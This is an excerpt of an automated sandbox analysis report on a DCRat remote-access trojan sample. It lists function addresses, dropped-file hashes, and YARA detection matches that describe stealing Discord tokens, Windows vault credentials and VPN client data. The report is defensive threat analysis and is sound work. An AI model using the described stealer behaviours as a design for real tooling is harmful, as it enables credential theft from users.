Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F42FD8	20_2_00007FF848F42FD8
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41A30	20_2_00007FF848F41A30
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F41A89	20_2_00007FF848F41A89
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F30E70	20_2_00007FF848F30E70
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F42D10	20_2_00007FF848F42D10
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF849120350	20_2_00007FF849120350
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F031DE	21_2_00007FF848F031DE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10A7D	21_2_00007FF848F10A7D
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F09296	21_2_00007FF848F09296
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F02AED	21_2_00007FF848F02AED
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0E99D	21_2_00007FF848F0E99D
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F043CD	21_2_00007FF848F043CD
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0D38F	21_2_00007FF848F0D38F
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10BC5	21_2_00007FF848F10BC5
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10D98	21_2_00007FF848F10D98
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F10DD0	21_2_00007FF848F10DD0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0A042	21_2_00007FF848F0A042
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F1005A	21_2_00007FF848F1005A
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0FFF0	21_2_00007FF848F0FFF0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490F221E	21_2_00007FF8490F221E
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D5990	21_2_00007FF8490D5990
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D0CCF	21_2_00007FF8490D0CCF
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EBCF4	21_2_00007FF8490EBCF4
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490F3386	21_2_00007FF8490F3386
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D3BDA	21_2_00007FF8490D3BDA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E6E80	21_2_00007FF8490E6E80
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E6EC0	21_2_00007FF8490E6EC0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490DAFFD	21_2_00007FF8490DAFFD
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EA890	21_2_00007FF8490EA890
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490FC8AE	21_2_00007FF8490FC8AE
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4AD3	21_2_00007FF8490D4AD3
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D38FA	21_2_00007FF8490D38FA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E0119	21_2_00007FF8490E0119
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D51F2	21_2_00007FF8490D51F2
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EEB15	21_2_00007FF8490EEB15
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4B10	21_2_00007FF8490D4B10
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EF328	21_2_00007FF8490EF328
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EEBF6	21_2_00007FF8490EEBF6
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D5605	21_2_00007FF8490D5605
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4DF8	21_2_00007FF8490D4DF8
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D46D3	21_2_00007FF8490D46D3
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D46C8	21_2_00007FF8490D46C8
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E0D69	21_2_00007FF8490E0D69
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EDD90	21_2_00007FF8490EDD90
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EDD79	21_2_00007FF8490EDD79
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490E5048	21_2_00007FF8490E5048
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490ED058	21_2_00007FF8490ED058
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490D4EFA	21_2_00007FF8490D4EFA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490EAF4D	21_2_00007FF8490EAF4D
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF8490DF7CD	21_2_00007FF8490DF7CD
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01520848	22_2_01520848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01523B50	22_2_01523B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015232D0	22_2_015232D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015245C0	22_2_015245C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01528C78	22_2_01528C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01525480	22_2_01525480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01521664	22_2_01521664
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01520838	22_2_01520838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015278C0	22_2_015278C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015278B0	22_2_015278B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_015270A8	22_2_015270A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01525399	22_2_01525399
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01523261	22_2_01523261
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526298	22_2_01526298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526288	22_2_01526288
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526D90	22_2_01526D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01526DA0	22_2_01526DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527418	22_2_01527418
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01528C20	22_2_01528C20
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527428	22_2_01527428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01522748	22_2_01522748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01522739	22_2_01522739
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527648	22_2_01527648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_01527639	22_2_01527639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_0544A388	22_2_0544A388
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_0544A398	22_2_0544A398
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_054483B4	22_2_054483B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD97B4	22_2_05DD97B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD9F48	22_2_05DD9F48
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDEEF0	22_2_05DDEEF0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD7E71	22_2_05DD7E71
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDE8F8	22_2_05DDE8F8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDD290	22_2_05DDD290
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DD9D69	22_2_05DD9D69
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDF770	22_2_05DDF770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDEEE0	22_2_05DDEEE0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDE8E9	22_2_05DDE8E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_05DDF348	22_2_05DDF348
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C17B8	22_2_062C17B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C0C18	22_2_062C0C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C1274	22_2_062C1274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C125F	22_2_062C125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C17A8	22_2_062C17A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 22_2_062C0C08	22_2_062C0C08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FD323D	25_2_00007FF848FD323D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FD8D9E	25_2_00007FF848FD8D9E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF848FD531A	25_2_00007FF848FD531A
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01130848	31_2_01130848
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01133B50	31_2_01133B50
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011332D0	31_2_011332D0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011345C0	31_2_011345C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01138C78	31_2_01138C78
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01135480	31_2_01135480
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0113161E	31_2_0113161E
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01130838	31_2_01130838
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011378B0	31_2_011378B0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011370A8	31_2_011370A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_011378C0	31_2_011378C0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01135399	31_2_01135399
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0113326F	31_2_0113326F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01136298	31_2_01136298
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01136D90	31_2_01136D90
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01136DA0	31_2_01136DA0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01138C20	31_2_01138C20
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01137428	31_2_01137428
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01132738	31_2_01132738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01132748	31_2_01132748
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01137639	31_2_01137639
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_01137648	31_2_01137648
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AD290	31_2_0B5AD290
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AE8F8	31_2_0B5AE8F8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A9F48	31_2_0B5A9F48
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AF770	31_2_0B5AF770
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A97B4	31_2_0B5A97B4
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A7E71	31_2_0B5A7E71
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AEEF0	31_2_0B5AEEF0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AF348	31_2_0B5AF348
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AE8E9	31_2_0B5AE8E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A17E9	31_2_0B5A17E9
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5AEEE0	31_2_0B5AEEE0
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0B5A9D69	31_2_0B5A9D69
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF17B8	31_2_0EDF17B8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF0C18	31_2_0EDF0C18
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF125F	31_2_0EDF125F
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF1274	31_2_0EDF1274
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF17A8	31_2_0EDF17A8
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 31_2_0EDF0C08	31_2_0EDF0C08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 47_2_00007FF848FE542A	47_2_00007FF848FE542A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 47_2_00007FF848FE334D	47_2_00007FF848FE334D

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Infected.exe A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Loaader.exe A150A433C6A3E4278F6CC4CBC85863FC431E5C1E65081AD67253513E8CA01282

Source: C:\Users\user\AppData\Roaming\Loader.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientAny.exe" vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe" vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWinDefend.exe4 vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Binary or memory string: OriginalFilenameTESTING.exe4 vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 20.2.Loader.exe.1d000000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 20.2.Loader.exe.1d000000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
